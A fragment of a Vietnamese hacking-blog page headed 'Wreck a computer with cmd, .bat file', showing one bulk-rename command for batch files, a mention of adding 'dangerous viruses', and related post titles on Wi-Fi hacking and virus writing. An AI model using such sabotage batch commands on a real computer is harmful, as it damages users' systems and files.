
REN * .BAT * .TXT

Lưu Đuôi .Bat

Phá máy tính với cmd, file .bat

Update Thêm Vài Con Virus Cực Nguy Hiểm

Để lại bình luận

Bài viết hay

Cách sử dụng HTTrack để download toàn bộ website

Nâng cấp Domain Controller trong Windows Server 2012 R2

Share khóa học Hacker mũ trắng và bảo mật thông tin

Cách tự diệt virus máy tính sạch sẽ trong vòng 2...

Hướng dẫn chi tiết Hack Wifi bằng Wifislax với USB mới...

Hướng dẫn chỉnh sửa thông tin CPU trên Windows

Hướng dẫn cài đặt Lingoes – Phần mềm tra từ điển...

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất

Hướng dẫn tự viết Virus đơn giản bằng Python